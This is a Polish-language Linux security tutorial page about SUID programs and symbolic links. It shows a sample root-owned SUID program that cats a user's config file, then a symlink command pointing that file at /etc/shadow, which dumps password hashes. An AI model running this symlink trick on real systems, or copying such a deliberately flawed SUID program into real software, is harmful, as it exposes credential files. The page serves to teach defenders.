 |
Bezpieczeństwo systemów Linux'owych |
|
Linux Security - Suidy
|
|
Dowiązania symboliczne
 |
| [1] [2] [3] [4] [5] |
|
|
Program typu SUID może wyświetlić zawartość pliku, którego właścicielem jest
zwykły użytkownik.
Przykładowy program może wyglądać tak jak ten poniżej: |
[root@localhost]# cat ankieta.c
void main()
{
system ("/bin/cat /home/tronix/.form.cfg");
}
[root@localhost]# ls -l /bin/ankieta
-rwsr-sr-x 1 root root 16728 Jul 28 1999 finger
[root@localhost]# cat /home/tronix/.form.cfg
Ankieta
Imie:Jan
Nazwisko:Kowalski
Adres:Warszawa ul.Wyspiańskiego 43
|
|
Zazwyczaj uruchomienie takiego programy nie stwarza żadnych zagrożeń
dla bezpieczeństwa
|
[root@localhost]# ankieta Ankieta Imie:Jan Nazwisko:Kowalski Adres:Warszawa ul.Wyspiańskiego 43 |
|
Gdy włamywacz jednak wie do jakiego pliku program się odwołuje i potrafi to umiejętnie wykorzystać to efekty są takie:
|
[tronix@localhost]$ ln -s -f /etc/shadow ~/.form.cfg [tronix@localhost]$ ankieta root:zttJEkXo/9XCM:11389:0:99999:7::: bin:*:11389:0:99999:7::: daemon:*:11389:0:99999:7::: |
|
Oczywiście to jest tylko bardzo prosty przykład i sam program
może być o wiele bardziej rozbudowany (może np. stwarzać możliwość
zapisu do pliku co praktycznie daje zwykłemu użytkownikowi nieograniczone możliwości).
|
ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - Księga gości - Statystka - Linki
Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved